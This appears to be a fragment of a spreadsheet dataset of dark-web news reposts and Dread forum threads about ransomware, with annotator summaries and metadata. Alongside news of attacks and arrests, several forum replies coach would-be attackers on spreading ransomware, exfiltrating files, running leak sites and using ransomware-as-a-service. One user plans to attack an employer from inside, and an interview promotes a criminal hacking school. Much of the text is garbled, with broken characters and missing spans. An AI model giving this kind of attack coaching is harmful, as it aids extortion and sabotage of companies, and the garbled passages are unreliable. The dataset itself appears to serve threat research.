of the ���ransomware consultant���, who collects a fee for advising offenders at key stages of an attack.;;arresting offenders;;governments and law enforcement agencies appear to be ramping up their efforts to tackle ransomware offenders, following a year blighted by their continued attacks. as the g7 met in cornwall in june 2021, ukrainian and south korean police forces coordinated to arrest elements of the infamous cl0p ransomware gang. in the same week, russian national oleg koshkin was convicted by a us court for running a malware encryption service that criminal o perform cyberattacks without being detected by antivirus solutions.;;while these developments are promising, ransomware attacks are a complex crime involving a distributed network of offenders. as the offenders have honed their methods, law enforcers and cybersecurity experts have tried to keep pace. but the relative inflexibility of policing arrangements, and the lack of a key offender (mr or mrs big) to arrest, may always keep them one step behind the cybercriminals ��� even if an extradition treaty is struck between the us and r</t>
  </si>
  <si>
    <t>News article descibing ransomware groups flexabillity and ability to avoid prosecution despite renewed attempts to stop ransomware attacks from world goverments</t>
  </si>
  <si>
    <t>20/06/2021 21:39</t>
  </si>
  <si>
    <t>37acd00651f0e0849fd2</t>
  </si>
  <si>
    <t>Inside a Ransomware Attack: How Dark Webs of Cybercriminals Collaborate to Pull One Off</t>
  </si>
  <si>
    <t>0 days 02:31:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 18}</t>
  </si>
  <si>
    <t>i am disappointed this is not a guide.</t>
  </si>
  <si>
    <t>User would've preferred a ransomware guide</t>
  </si>
  <si>
    <t>21/06/2021 00:10</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the pandemic has created formidable challenges for industries across the board ��� but none more so than healthcare. in addition to needing to accommodate often staggering influxes of seriously ill patients, hospitals and other medical providers face the foreboding prospect of an extended spike in cyber threats: since the beginning of november, attacks targeting healthcare organizations have increased by 45 percent, more than doubling the overall increase for all sectors worldwide.;;in a perfect world, cybercriminals would spare such institutions and allow doctors and nurses to provide essential care without the risk of life-saving devices and systems going down due to an incident. but this is far from a perfect world, and the criminals instead perceive covid-19 as an opportunity to seek out victims in larger numbers, with more lucrative outcomes. the usual culprits ��� ransomware, botnets, remote code execution and distributed denials-of-service (ddos) ���play here. ransomware has emerged as a particularly effective mo, given that hospital leaders are inclined to pay up quickly to avoid even temporarily shutting down operations which support pandemic patients.;;in what could be an even more chilling development, we���re seeing these criminals flocking to increasingly active and profitable ���supply chains��� in the online underworld to strengthen their ability to attack.;;specifically, they���re heading to the dark web and posting inquiries to purchase leaked medical databases, email lists, credentials and passwords. the whole, as they say, is greater than the sum of its parts. by combining resources and intelligence, hackers are better positioned than ever to ���strike big��� via methodically executed intrusions which jeopardize patient safety. indeed, these supply chains are collectively creating a cyber attack machine ��� one that promises to unleash more devastating and lasting damage than we���ve seen to dated suspicious parties targeting hospitals in france. here is what we found:;;��� on jan. 31, 2021, a user posted this on an english-speaking underground forum: ���i���m looking for france databases with 2020 leads, health related are the ones i prefer.��� he promptly received a response offering databases in exchange for cryptocurrency payments. this reflects the emergence of exposed databases ��� which are readily accessed at on-premise servers, connected specialty equipment and the cloud where misconfigurations and/or poor controls leave data and network inroads visible ��� as products to steal and sell.;;��� on feb. 4, 2021, another user published an ad for the sale of a ���database of a company that works with many (if not all) hospitals��� which contained 50,000 employee email addresses along with passwords and phone numbers. this reminds us of how criminals leverage third-party software and partners to bypass their intended victims��� security care sector relies on for software, tech support, billing, data reporting, etc., they can launch credential-stuffing exploits of the third party���s downstream customers.;;��� on feb. 12, a third user unveiled a database of nearly 500,000 hospital records with names, email addresses, phone numbers, social security numbers and patient information. this is often made possible due to vulnerabilities within cheap, network-attached storage products. once the storage is compromised, adversaries use the database information to conduct fraud/social-engineering schemes.;;so what should healthcare organizations do in response? we recommend the following best practices:;;raise employee awareness. every employee performs a key role in making sure that no one inadvertently bypasses security controls and compliance policies, no matter how fast-paced and urgent the demand for care. it and security teams must constantly remind staffers via training about the policies ��� and what is at stake if they are cirg with updates about the latest phishing emails and malicious attachments. ongoing assessments of the overall state of cyber hygiene will further help fortify the network.;;maximize patching and encryption efforts. unpatched software is susceptible to years-old exploits. then, misconfigurations and/or a lack of clear ownership will lead to a failure to activate built-in encryption features on software, collaboration and device platforms. the upshot: software maintenance should begin the moment a new product or application is installed, with patching, encryption and preventative steps such as the changing of default passwords and enforcement of out-of-the-box security protocols. what���s more, it���s essential to deploy aggressive asset discovery and monitoring so organizations gain complete visibility of their expanding attack surface, which includes third-party cloud applications, connected storage devices, open databases and operational technology (ot)/internet of things (iot) systems.;;monitor t risky remote connections. these connections play a critical role in patient care. when remote desktop protocol (rdp) and virtual private network (vpn) access are required, teams need to enable all enhanced security settings so only trusted parties are authorized. in addition, they must monitor internet traffic to look for trouble signs, such as an anomalous large-scale data exfiltration.;;it is unsettling to know that hackers are not only eager to take advantage of the pandemic crisis, but that they���re feeding off of a highly profitable supply chain of stolen digital assets to do so. while hospitals are the target, the patient is ultimately the true victim of this cyber attack machine.;;that���s why it is imperative for healthcare leaders and their it/security teams to raise employee awareness of the latest methods, patch/encrypt all software, enforce additional protocols and establish total visibility of their entire cyber ecosystem. it is only after implementing these practices that administors and nurses can stop worrying about the next attack and focus on the task at hand ��� saving lives and making sick people b</t>
  </si>
  <si>
    <t>Article on the threats on healthcare during the covid-19 pandemic including ransomware and what they need to do to resolve it</t>
  </si>
  <si>
    <t>28/04/2021 15:39</t>
  </si>
  <si>
    <t>7e4642fb34d2c8e123fe</t>
  </si>
  <si>
    <t>Inside the Cyber Attack ���Machine���: What Hospitals Need to Know about the Dark Web and Post-Pand</t>
  </si>
  <si>
    <t>0 days 05:05:00</t>
  </si>
  <si>
    <t>the ransomware economy has expanded over the last few years due to dark web and cryptocurrency advancements;;http://tapeucwutvne7l5o.onion/inside-the-dark-webs-ransomware-as-a-service-economy</t>
  </si>
  <si>
    <t>Post stating ransomware economy has expanded due to advancements</t>
  </si>
  <si>
    <t>29/09/2020 14:38</t>
  </si>
  <si>
    <t>ea1d3e82db9a414adee1</t>
  </si>
  <si>
    <t>Inside the Dark Web���s Ransomware-as-a-Service E</t>
  </si>
  <si>
    <t>because a contract manufacturer did not want to meet the ransom demands of cyber criminals, they published internal documents of the us companies boeing, lockheed martin and spacex. among them was military data.;;the target of the attack was visser precision, a us technology producer. the perpetrators infected his computer with the;ransomware doppelpaymer;, which encrypted files. visser, however, refused to pay a ransom for the decryption. as a result, the perpetrators published files on the net which they had copied from visser's computers.;;these files were internal data of visser customers boeing, lockheed martin and spacex,;reports the british online news service the register;, citing an informant who discovered the data on the net. the data includes payment information, legal documents and documents about spacex's production program.;;the perpetrators also published the specifications for an antenna of a lockheed martin mortar defense system. the company is aware of the incident and is responding with;our standard response procedure for possible cyber incidents in our supply chain;,  the aerospace company told the register. the company is investing heavily in cyber security. this includes supporting and guiding suppliers.;;boeing and spacex, as well as visser precision itself, declined to comment on the matter.</t>
  </si>
  <si>
    <t>Post detailing the leak of internal data from space companies after refuisng to pay a ransom</t>
  </si>
  <si>
    <t>9245d9676b246913c47d</t>
  </si>
  <si>
    <t>Internal data of space companies leaked</t>
  </si>
  <si>
    <t xml:space="preserve">;hacktown is a university for aspiring hackers that provides courses on fraud, hacking, ransomwares etc all specially designed for newbies. today, the onion web interviewed funshine, the admin of hacktown;;;what are your skills?;;i���ve been in and out of the black hat hacking scene my whole life and turned cyber-criminal for a few years.;;the hacking skills i possess are those that make up a cyber-criminal which include:;;- social engineering;- coding my own rats and ransomware for personal profit.;- web application hacking.;- python;- wi-fi hacking;- av evasion techniques and tactics.;;i���m a self taught home grown hacker but have also taken post secondary computer security courses along with holding many certifications in the field (ceh, cssp, giac, etc.) but i focus on the hacking skills needed for an effective cyber-criminal.;;;;what inspired you into creating hacktown?;;i cashed out all my profits after bitcoin skyrocketed and never looked back. however, too much free time on my hands made y go bananas and i was sick of seeing such shit in the forums. the amount of misinformation out there was crazy. i realized how much more difficult it is now to learn certain ���hacking��� information and there was such a void out there for newcomers.;;there wasn���t a place that would teach me what i want to know. just posts in forums touching on topics but not giving me the goods i needed. i was pretty high on a lot of drugs one night and i had a moment about creating hacktown. i wanted to create a place based on my experience and expertise as a cyber-criminal to teach people what i would want to be taught when i first started out.;;hacktown is meant to teach you how i was successful financially through cyber-crime so others can replicate my tactics, techniques, and procedures for their own financial gains.;;;how long were you a member of torum before it went down? do you miss it?;;too long. i really can���t remember when i joined there but i lurked for a long time before making a dicting people who i deemed would make good associates for what i was into.;;i don���t miss it. torum had so much more potential but was flooded with posts about ���how to hack my girlfriend��� topics and that type of people. in the end there was too much crap on there to make it anything worth wild.;;few months ago a group of iranian hackers accidentally leaked their hacking videos which were created for their members. do you plan on creating educational videos anytime soon?;;;;continue reading this interview here:;;http://onionwsoiu53xre32jwve7euacadvhprq2jytfttb55hrbo3execodad.onion/2020/12/30/interview-with-hacktown-admin-funshine/;;subscribe to the onion web's subdread for daily articles related to the dark web.;/d/theonionweb;;;;the onion web is a news portal where you can find and read about the latest news, interviews, guides and lot of more interesting resources; all darknet related. join the onion web and let's explore the </t>
  </si>
  <si>
    <t>Interview with Funshine, a notable education provider on dread, including ransomware guides</t>
  </si>
  <si>
    <t>31/12/2020 17:46</t>
  </si>
  <si>
    <t>/d/TheOnionWeb</t>
  </si>
  <si>
    <t>31b5c690a9b410fcebf2</t>
  </si>
  <si>
    <t>Interview with HackTown's admin Funshine</t>
  </si>
  <si>
    <t>;what are your skills?;;i���ve been in and out of the black hat hacking scene my whole life and turned cyber-criminal for a few years.;;the hacking skills i possess are those that make up a cyber-criminal which include:;;- social engineering;- coding my own rats and ransomware for personal profit.;- web application hacking.;- python;- wi-fi hacking;- av evasion techniques and tactics.;;i���m a self taught home grown hacker but have also taken post secondary computer security courses along with holding many certifications in the field (ceh, cssp, giac, etc.) but i focus on the hacking skills needed for an effective cyber-criminal.;;;;what inspired you into creating hacktown?;;i cashed out all my profits after bitcoin skyrocketed and never looked back. however, too much free time on my hands made me eventually go bananas and i was sick of seeing such shit in the forums. the amount of misinformation out there was crazy. i realized how much more difficult it is now to learn certain ���hacking�here was such a void out there for newcomers.;;there wasn���t a place that would teach me what i want to know. just posts in forums touching on topics but not giving me the goods i needed. i was pretty high on a lot of drugs one night and i had a moment about creating hacktown. i wanted to create a place based on my experience and expertise as a cyber-criminal to teach people what i would want to be taught when i first started out.;;hacktown is meant to teach you how i was successful financially through cyber-crime so others can replicate my tactics, techniques, and procedures for their own financial gains.;;;how long were you a member of torum before it went down? do you miss it?;;too long. i really can���t remember when i joined there but i lurked for a long time before making a different handle and contacting people who i deemed would make good associates for what i was into.;;i don���t miss it. torum had so much more potential but was flooded with posts about ���how to hack my girlt type of people. in the end there was too much crap on there to make it anything worth wild.;;;few months ago a group of iranian hackers accidentally leaked their hacking videos which were created for their members. do you plan on creating educational videos anytime soon?;;;accidentally or we���re hacked and posted online? ;);;yes there is only a few videos within the hacktown courses right now. in the latest update being pushed out shortly this will increase the amount of videos for people to watch and learn from. i���m looking at creating more in the future. as time passes on hacktown will improve and be better.;;;alot of con artists aka scammers pretend to offer social media hacks for which many people fall for. do you believe that it's possible to do so without phishing?;;it���s more than phishing these days.;;phishing is just one skill required in order to successfully compromise and individual these days. social engineering is a large part of being successful.;;without phishing or infual(s) with malware to gleam their online credentials form their laptop nothing else can accomplish the task.;;;in terms of hacking, what kind of successes you had?;;the moment i decided to step over that line into a cyber-criminal life it took me just under (2) years to make over a million dollars. cryptcurrency boom happened and i checked out.;;many people argue over which distro is best for pentesting and claim that kali is overrated? what are your thoughts on it?;;kali. use kali and install the tools you use in kali on a remote server when using your attacks in the wild.;;;are there any upcoming features we should expect from hacktown?;;hacktown should be complete in 2021 with all courses released. i���m releasing courses based on my experience and eventually all courses will be released. once this happens i can improve on hacktown logistics and operations.;;once act vi is released early next year there will be an opportunity to work collectively within hacktown and gain experience when working in a group when dealing with rats and ransomware.;;it will be a unique opportunity to work together and will have future ���missions��� to participate in.;;;do you think you would ever offer your own scripts, bots, malwares etc for sale?;;yes. this is currently the case. at the ���armory��� you can purchase the latest and greatest malware out there.;;;ddos attacks play a big role in taking down onions, if hacktown was under heavy ddos attack. how would you defend yourself against it?;;the same as everyone else. roll out captchas and onion balance the servers. ddos on hidden services is a constant battle.;;;what would you like to say to the aspiring hackers who struggle to find the right path to begin?;;don't go on forums looking for this knowledge in the beginning.;;it's best to take an online course that's alr"hackers". it's best to download and go through courses already released such as certified ethical hacker (ceh), offensive security, and elearnsecurity. some of those courses are leaked and available to download torrents for.;;it'll put you on the right path without getting lost down the rabbit hole giving you a solid foundation to build upon.;;lastly, focus on what you're good at. if you're not a master programming that's ok because you can use free tools or purchase the ones you required.</t>
  </si>
  <si>
    <t>31/12/2020 17:51</t>
  </si>
  <si>
    <t>b88480bcdc5842df8ffd</t>
  </si>
  <si>
    <t>22 days 03:57:00</t>
  </si>
  <si>
    <t>;;a state-sponsored advanced persistent threat (apt) actor newly christened apt42 (formerly unc788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the iranian government at least since 2015.;;cybersecurity firm mandiant said the group operates as the intelligence gathering arm of iran's islamic revolutionary guard corps (irgc), not to mention shares partial overlaps with another cluster called apt35, which is also known as charming kitten, cobalt illusion, itg18, phosphorus, ta453, and yellow garuda.;;apt42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in australia, europe, the middle east, and the u.s.;;intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the covid-19 pandemic in march 2020, indicating the threat actor's ability to swiftly modify its campaigns in order to meet its operational priorities.;;"apt42 uses highly targeted spear-phishing and social engineering techniques designed to build trust and rapport with their victims in order to access their personal or corporate email accounts or to install android malware on their mobile devices," mandiant said in a report.;;the goal is to exploit the fraudulent trust relationships to steal credentials, enabling the threat actor to leverage the access to conduct follow-on compromises of corporate networks to gather sensitive data and use the breached accounts to phish additional victims.;;attack chains involve a mix of highly targeted spear-phishing messages aimed at individuals and organizations of strategic interest to iran. they are also conceived with the intent to build trust with former government officials, journalists, policymakers, and the iranian diaspora abroad in hopes of distributing malware.;;outside of using hacked email accounts associated with think tanks to target researchers and other academic organizations, apt42 is often known to impersonate journalists and other professionals to engage with the victims for several days or even weeks before sending a malicious link.;;;;;in one attack observed in may 2017, the group targeted members of an iranian opposition group operating from europe and north america with email messages that contained links to rogue google books pages, which redirected victims to sign-in pages designed to siphon credentials and two-factor authentication codes.;;surveillance operations involve the distribution of android malware such as vinethorn and pineflower via text messages that are capable of recording audio and phone calls, extracting multimedia content and smses, and tracking geolocations. a vinethorn payload spotted between april and october 2021 masqueraded as a vpn app called safervpn.;;"the use of android malware to target individuals of interest to the iranian government provides apt42 with a productive method of obtaining sensitive information on targets, including movement, contacts, and personal information," the researchers noted.;;the group is also said to use a raft of lightweight windows malware from time to time ��� a powershell toehold backdoor named tamecat, a vba-based macro dropper dubbed tabbycat, and a reverse shell macro known as vbrevshell ��� to augment their credential harvesting and espionage activities.;;;;;;apt42's links to apt35 stems from links to an uncategorized threat cluster tracked as unc2448, which microsoft (dev-0270) and secureworks (cobalt mirage) disclosed as a phosphorus subgroup carrying out ransomware attacks for financial gain using bitlocker.;;mandiant's analysis further lends credence to microsoft's findings that dev-0270/unc2448 is operated by a front company that uses two public aliases, namely secnerd and lifeweb, both of which are connected to najee technology hooshmand.;;that having said, it's suspected the two adversarial collectives, despite their affiliation with irgc, originate from disparate missions based on differences in targeting patterns and the tacti;;a key point of distinction is that while apt35 is oriented towards long-term, resource-intensive operations targeting different industry verticals in the u.s. and the middle east, apt42's activities focus on individuals and entities for "domestic politics, foreign policy, and regime stability purposes.";;"the group has displayed its ability to rapidly alter its operational focus as iran's priorities change over time with evolving domestic and geopolitical conditions," the researchers said.;;;</t>
  </si>
  <si>
    <t>Post descibing espionage attacks from a certain actor, notable as this actor has similarities and is possible the same actor who performed a large number of ransomware attacks (phosphorus subgroup using bitlocker)</t>
  </si>
  <si>
    <t>/u/mr_asur</t>
  </si>
  <si>
    <t>56244589175c6bf12976</t>
  </si>
  <si>
    <t>Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents</t>
  </si>
  <si>
    <t>i do know;they are online but after the breach in spring this year most active groups and users moved to xss ( former damagelab ) and exploit, and then after increased repression on cybercrime following collonial pipeline hack they also moved from there, maza is almost dead.;i mean, same as coru, maza exists. but none buisness is happening there now. it is more like a chat club of russian cybercrime elite.;;currently, hottest and most exclusive cybercrime forum is ramp, ransomware market place;;is 3 digit number of users there;i am one of them</t>
  </si>
  <si>
    <t xml:space="preserve">Post asking about the status of the Maza cybercrime forum, notable as the user mentioend ramp is currently the best place for ransomware discussions </t>
  </si>
  <si>
    <t>20/11/2021 15:30</t>
  </si>
  <si>
    <t>124fe84b58e3e3c55df2</t>
  </si>
  <si>
    <t>Is Mazafaka still around?</t>
  </si>
  <si>
    <t>2 days 13:00:00</t>
  </si>
  <si>
    <t>i've only recently started to look through this subdread but i don't see much about ransomware. is it because it isn't that profitable or people just don't like the ethics of it?</t>
  </si>
  <si>
    <t>User commenting on the lack of ransomware discussions and asking on the profitabiillity/ ethicality of it</t>
  </si>
  <si>
    <t>/u/badabing120</t>
  </si>
  <si>
    <t>b6bb61f8891fe46d0184</t>
  </si>
  <si>
    <t>Is ransomware an effective way to make $$</t>
  </si>
  <si>
    <t>102 days 05:53:00</t>
  </si>
  <si>
    <t>that's not so easy to answer.;;after all, there are several possibilities. are you able to write ransomware? if so, then you have to invest the time. but this leads to the problem that in the time you are busy programming, you do not have time to look for victims. for that you need a partner who distributes your software and has to be paid.;if you can't program such software yourself, but you have basic knowledge to customize such software, then you have enough time to look for victims, but a problem to find a partner who sells you good ransomware. same thing. that's how i started, and it was a good decision.;;if you think this is all a simple thing and runs like a game, then you can go right back and send us all here a picture of you burning $50,000. it comes out to the same thing.;;my tip: find a partner who can deliver the software and get busy with some sophisticated infiltration.;;as for ethics: it depends on your "customers". if you want to deprive "m��decins sans fronti�" of their donations, then feel free to shoot yourself.;if you take $75,000 from heckler &amp; koch, they won't even tell anyone about it. i think you understand what i mean.</t>
  </si>
  <si>
    <t>/u/pixie</t>
  </si>
  <si>
    <t>0 days 00:30:00</t>
  </si>
  <si>
    <t>yeah i know what you mean. i already have software, i'm using it for personal reasons against a specific group of people but it cost a lot to procure the software and i'm trying to see if there is an easy-ish way to get some of that money back. but honestly it seems pretty unappealing, at least with carding you can tell yourself you're just stealing from big banks but this is just taking from some innocent persons pocket and putting it in yours.</t>
  </si>
  <si>
    <t>for example, lets say i want to make money. lets say the company that i want to send ransomeware is a debt collection company. so do i send a ransomeware via email, and then once i get access, then somehow manage to get access to all the servers? once i do i threaten do delete all the information or whatever and if they dont want that to happen they pay a fee?</t>
  </si>
  <si>
    <t>New user asking how ransomware works</t>
  </si>
  <si>
    <t>/u/bulldogwoofwoof</t>
  </si>
  <si>
    <t>22/11/2021 04:20</t>
  </si>
  <si>
    <t>7be7691c778e63e00b2c</t>
  </si>
  <si>
    <t>Is this is how a ransomeware works? (newbie)</t>
  </si>
  <si>
    <t>19 days 21:32:00</t>
  </si>
  <si>
    <t>you've got like half of it - you generally start by infecting 1 computer (via phishing) and then trying to spread to machines with more valuable info (think file servers, databases, etc.)  a lot of malware has capabilities for scanning the computer's network for other vulnerable machines and that's typically how they spread.  once you have a sufficiently important box infected, then you kick off the ransomware file encryption (generally while sending a copy of the unencrypted file to a 3rd party server you control) and once a certain % of the disk is encrypted you show a popup with your demands or whatever.  you don't necessarily threaten to delete their stuff if they don't pay, but rather they need to pay to get the decryption key, otherwise their files will stay encrypted and useless.  alternatively you could threaten to leak some of the unencrypted files you exfiltrated initially as well (that's why some ransomware gangs maintain "leak sites").  typically they will want to negotiate on price so some way of communicating for that should probably be set up as well.;;are you looking to use a random ransomware binary and try this on your own?  if so you might want to look at one of the ransomeware as a service people who provide a lot of the additional things i mentioned above (chatroom, exfiltration server, etc) unless you want to build them yourself.</t>
  </si>
  <si>
    <t>22/11/2021 06:41</t>
  </si>
  <si>
    <t>0 days 02:21:00</t>
  </si>
  <si>
    <t>yeap... that's pretty much it, you essentially hold there own data hostage until they give in to your demands,</t>
  </si>
  <si>
    <t>/u/elloworld</t>
  </si>
  <si>
    <t>a) get in their network;b) in spreads across network (usually at around 2.6 seconds);c) all computers are locked useless without key;d) message displays demand for money for release of their locked data</t>
  </si>
  <si>
    <t>22/11/2021 07:53</t>
  </si>
  <si>
    <t>0 days 01:12:00</t>
  </si>
  <si>
    <t>such company using encrypted datas everywhere, be sure your ransomware is builded against it, and do some recon on their networks before doing it, my friend tried and it was fucking harder than he thought.</t>
  </si>
  <si>
    <t>25/11/2021 21:17</t>
  </si>
  <si>
    <t>3 days 13:24:00</t>
  </si>
  <si>
    <t>if you already have access to the network but it's limited because you a normal employee.;who can the ransomeware be spread to the main server and back up server? what i understand if you don't encrypt the back up files they can just rewrite and they are back as normal. is this correct?</t>
  </si>
  <si>
    <t>/u/HolySign</t>
  </si>
  <si>
    <t>15 days 03:03:00</t>
  </si>
  <si>
    <t>once successfully installed on your computer system, it encrypts data on the hard drive and then starts looking for open and connected networks. network segmentation is the best possible solution as it limits the access to virus attack. once it floods the entire lan that that machine is on, it encrypts all the files, rendering them useless. there is no undoing of the encryption.;;anything that isn't read-only gets encrypted and is done for. the hope is that the server had offline backups close enough to the time of impact.</t>
  </si>
  <si>
    <t>0 days 03:48:00</t>
  </si>
  <si>
    <t>thanks!;so let's say i will infect my own computer when i'm at the company network. then it starts to spread to the computers on site an beond. everything going as plan and they unlock the encryption. can they see on which computer it started with? or they can't track it back to my computer?;;i'm just intrested to get them in trouble, not the money. so if there will be any up for it, i can just open the door in.</t>
  </si>
  <si>
    <t>0 days 18:39:00</t>
  </si>
  <si>
    <t>yes, forensics can tell the origin source.;it affects all the computers on the same vlan.;it cannot be decrypted without the key, which they do not possess.</t>
  </si>
  <si>
    <t>0 days 03:05:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;campari has refused to engage with the ransomware gang and is restoring systems. campari group, the famed italian beverage vendor behind brands like campari, cinzano, and appleton, has been hit by a ransomware attack and has taken down a large part of its it network.;;the attack took place last sunday, on november 1, and has been linked to the ragnarlocker ransomware gang, according to a copy of the ransom note shared with zdnet by a malware researcher who goes online by the name of pancak3. the ragnarlocker gang is now trying to extort the company into paying a ransom demand to decrypt its files.;;but the ransomware group is also threatening to release files it stole from campari's network if the company doesn't pay its ransom demand in a week after the initial intrusion.;;screenshots of campari's internal network and corporate documents have been posted on a dark web portal where the ragnarlocker gang runs a "leak site", as proof of the intrusion. included in these proofs is even a copy of the contract signed by campari with us actor matthew mcconaughey for the wild turkey bourbon brand.;;in a text chat window available to ragnarlocker victims, a campari representative has not replied to the ransomware gang. the ransom demand is currently set for $15 million.;;instead, the italian company appears to have chosen to restore its encrypted systems rather than pay the ransom demand, according to a short press release published on tuesday, where campari said it's working on a "progressive restart in safety conditions.";;in the same press release, campari also said it detected the intrusion as soon as it took place and immediately moved in to isolate impacted systems, and that the incident is not expected to have any significant impact on its financial results. however, at the time of writing, campari websites, email servers, and phone lines are still down, five days after the attack.;;a campari representative also couldn't be reached because of the company's current state of affairs. campari is the second major beverage vendor after arizona beverages that's knocked online because of a ransomware attack in the past two years.</t>
  </si>
  <si>
    <t>Company Campari refused to engage with ransomware group causing them to be knocked offline</t>
  </si>
  <si>
    <t>99bdcbc347b123436a41</t>
  </si>
  <si>
    <t>Italian Beverage Vendor Campari Knocked Offline After Ransomware Attack</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;the wall street journal last night reported in an exclusive that jbs paid its revil attackers $11 million in bitcoin to restore the systems and data affected by the gang���s ransomware attack. the payment was made after most of jbs���s plants had returned to operation.;;;source:;the cyberwire;;the company says it had all of its data backed up, and that as far as it could tell no customer, supplier, or employee data had been compromised. this has prompted questions about what might have been worth $11 million to protect, and it appears that jbs may have been hedging against re-attack. ���it was insurance to protect our customers,��� the ceo of jbs's us division said.;;bloomberg quint reports on the reception colonial pipeline���s ceo joseph blount jr. received from congress during his testimony. it was chilly. the company���s failure to have adopted a stronger security posture was criticised, as was its decision to pay ransom, the fbi��standing.;;first, the reception colonial received renders more implausible speculation that the company paid darkside in cooperation with the fbi, the better to help the bureau cripple the extortionists' infrastructure. according to reuters, italy plans to establish a national cybersecurity agency as it works toward a national cloud infrastructure plan.;;thehill reports that iconstituent, a vendor that provides constituent management services (the elected officials��� equivalent of crm) to some sixty offices of both parties, was hit by ransomware, leaving members of congress unable to contact their constituents for several </t>
  </si>
  <si>
    <t>Article discussing the ransomware payment given to Revil by JBS in order to resolve a ransoware attack</t>
  </si>
  <si>
    <t>94db684df72e7e6b6690</t>
  </si>
  <si>
    <t>JBS Discloses Ransom Payment to REvil. Congress Grills Colonial Pipeline. Italy Plans a Cyber Agency. Constituent Service Down?</t>
  </si>
  <si>
    <t>{'darkside': 1, 'revil': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>i'm currently messing around with file encryption in python and considering making a ransomware of my own, but am looking at learning golang for rats.</t>
  </si>
  <si>
    <t>user considering making their own ransomware</t>
  </si>
  <si>
    <t>debate / potential hacker (individual)</t>
  </si>
  <si>
    <t>/u/Skeptech</t>
  </si>
  <si>
    <t>28/05/2022 07:10</t>
  </si>
  <si>
    <t>f7bd21e54cb3d45e5b1c</t>
  </si>
  <si>
    <t>JavaScript Malware</t>
  </si>
  <si>
    <t>3 days 13:00:00</t>
  </si>
  <si>
    <t>11 days 19:53:00</t>
  </si>
  <si>
    <t>i still keep antivirus software running for those just in case scenarios. i run webroot secureanywhere, malwarebytes and i just bought zonealarm anti-ransomwear because of all that ransomwear that's going around.;;malwarebytes is probably my favorite, but it's not meant to be a full fledged av, you still need a full av to run along side it. it'll block malicious sites i don't know about and block ips that are trying to connect to me or i'm connecting to.;;zonealarm anti-malware has a honeypot system that puts random files all over your computer and hides them, so if anything accesses them for no reason it will halt the system from running any executable files so it will halt the ransomwear from encrypting your computer. it also backs up your important files, so if they get encrypted, you'll have backups. it was the top rated anti-ransomwear software pick.;;;check point zonealarm anti-ransomware review;;i also have a ton of browser extensions in my clearweb browser that will flag malware and ransomwear sites, i think the best one is;netcraft;. it's freeware. also, if you come across a questionable site you can scan it with virustotal or;urlvoid;which checks it against all the known unsafe browser databases.</t>
  </si>
  <si>
    <t>User commenting on the death of John McAfee, noted they bought a large amount of ransomware</t>
  </si>
  <si>
    <t>24/06/2021 18:44</t>
  </si>
  <si>
    <t>01ca91a96757d7c03b17</t>
  </si>
  <si>
    <t>John McAfee is dead leaving this world with his penis on</t>
  </si>
  <si>
    <t>0 days 01:13:00</t>
  </si>
  <si>
    <t>5 days 05:24:00</t>
  </si>
  <si>
    <t>it definitely makes sense to have them for jic scenarios. i also use mv. that anti-ransomware sounds really cool though, who would have thought of that idea? defintely not me lol.</t>
  </si>
  <si>
    <t>25/06/2021 01:57</t>
  </si>
  <si>
    <t>0 days 07:13:00</t>
  </si>
  <si>
    <t>does anyone know which msps were affected by the kaseya ransomware?</t>
  </si>
  <si>
    <t>User asking for information on what managed storage providers are affected by Kaseya ransomware attack</t>
  </si>
  <si>
    <t>623238d32ce006341608</t>
  </si>
  <si>
    <t>Kaseya Ransomware</t>
  </si>
  <si>
    <t>1 days 00:37:00</t>
  </si>
  <si>
    <t>i read more than 40 msps have been affected and over 37000 compaines. which ones exactly, we won't know until everything is over.</t>
  </si>
  <si>
    <t>0 days 01:09:00</t>
  </si>
  <si>
    <t>posted by: sam jona;;;;a 38-year-old russian hacker awaits sentencing after pleading guilty to account theft and id trading on the black market. peter yuryevich levashov used botnet to get unauthorized access to credentials and offered information for sale on the darknet. according to a report, he operated multiple botnets since the 1990s. his mode of operation was specifically focused on kelihos which he used to send spam messages. other than the kelihos operation, he was setting up fraudulent schemes which he used to defraud many americans.;;levashov has been marked as one of the most notorious hackers in the world, ranking 7th in spamhaus��� world worst hackers. after a successful operational run, the justice department released a complaint filed against him and alan m. ralsky in 2008, for engaging in a fraudulent scheme called ���stock spam pump and dump scheme.��� this scheme focused on deceiving people into buying cheap fake stocks with an expectation of getting a higher return in the  arrested and handed a four-year jail term in 2009.;;aside from sending spam messages in bulk to victims and installing malware and ransomware on their computers, he advertised and sold dangerous malware. on april 7, 2017, the spanish authorities acted on an international arrest warrant to detain him and later extradited him to the united states. according to the justice department, over 50,000 computers were infected by the kelihos botnet at the time of his arrest.;;kenneth a. blanco, an acting assistant attorney general in the justice department���s criminal division said that they were able to intercept some of the kelihos botnets through the strong cooperation between the law enforcement and experts from the private industries, as well as, the use of legal and technical tactics. the botnet interruption was as a result of the rule 41 warrant.;;his arrest was earlier linked to political reasons. a report stated that levashov fought hard to avoid the extradition as he claimed that the u.s. intended to litical information from him since he worked for vladimir putin���s united russia party for 10 years. also, it was believed that levashov was involved in the u.s. election hacking, however, the fbi clarified that his arrest was solely based on his engagement in fraudulent activities.;;russia reacted to the extradition by requesting a counter extradition in september 2017. the spanish high court, however, honored the extradition request to the united states after charging him with wire fraud and unauthorized interception of electronic communications. a report stated prosecutors sought to hand him a 52-year jail sentence.;;the grand jury was presented with an indictment charging him with seven crimes. levashov pleaded guilty to multiple counts including; ���a count of causing damage to protected computers, a count of conspiracy, a count of wire fraud and a count of aggravated identity theft.���;;in a statement, the fbi in combination with other agencies and the state will put in the same efforo protect the citizens from cyber-attacks. even though the fbi attempted to make cybercrime a thing of the past, the individuals and organizations are also expected to update their antivirus software and be careful with the links they click.;;assistant attorney general benczkowski expressed his gratitude to the international law enforcement agencies, especially the spanish authorities for their key role played in the arrest of the 38-year-old. he commended them for arresting and extraditing levashov, showing how effective the collaboration with the international law enforcement agencies has been. levashov has currently been held in federal lock up by u.s. district judge robert n. chatigny as he awaits his sentencing, which is scheduled to take place on september 6, 2019.;;link: 